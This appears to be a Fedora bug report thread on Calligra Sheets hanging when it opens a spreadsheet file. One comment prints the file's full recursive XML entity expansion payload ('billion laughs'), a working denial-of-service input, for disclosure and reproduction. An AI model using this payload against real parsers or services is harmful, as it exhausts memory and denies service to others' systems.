Description of problem: Version-Release number of selected component (if applicable): calligra-sheets-2.7.4-1.fc19.x86_64 How reproducible: Steps to Reproduce: 1. Point browser at http://search.cpan.org/src/DDICK/Spreadsheet-CSV-0.07/t/data/bombs/maindoc.ksp 2. Click OK to open file in Calligra Sheets 3. Watch as Calligra Sheets consumes machine resources processing the external entities inserted in it Actual results: Calligra Sheets consumes excessive machine resources Expected results: Calligra Sheets should at a minimum refuse to open a file that it detects has defined entities. Additional info:
Hello, The above file do seem to crash Calligra Sheets after some time, but can you be more specific about the contents (external entities) of the file that causes this crash.
Hi Ratul, The above file (like most modern spreadsheet files) is a zip file and can be unpacked with a standard zip utility. The zip archive contains the following entries; * documentinfo.xml * maindoc.xml * mimetype * preview.png The maindoc.xml file contains the following entity definitions. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <spreadsheet xmlns="http://www.calligra.org/DTD/tables" syntaxVersion="1" mime="application/x-kspread" editor="Calligra Sheets"> with the entity &lol9; is then included in the body of the spreadsheet. Note there is no external entity definition in this file. This file contains just a standard recursive entity attack as per http://cwe.mitre.org/data/definitions/776.html
The document opens for me on f19, but it does take about ~40 seconds on my decently-powered (dell optiplex 7010) box
I take it you have more than 300Mb (3 * (10 ^ 8) of RAM then. I wasn't trying to nuke peoples machines, i was just providing a proof of concept.
Making this public, as upstream bug is public.
This bug appears to have been reported against 'rawhide' during the Fedora 22 development cycle. Changing version to '22'. More information and reason for this action is here: https://fedoraproject.org/wiki/Fedora_Program_Management/HouseKeeping/Fedora22
Let's continue to track this upstream (currently have to plans to fix this fedora-only)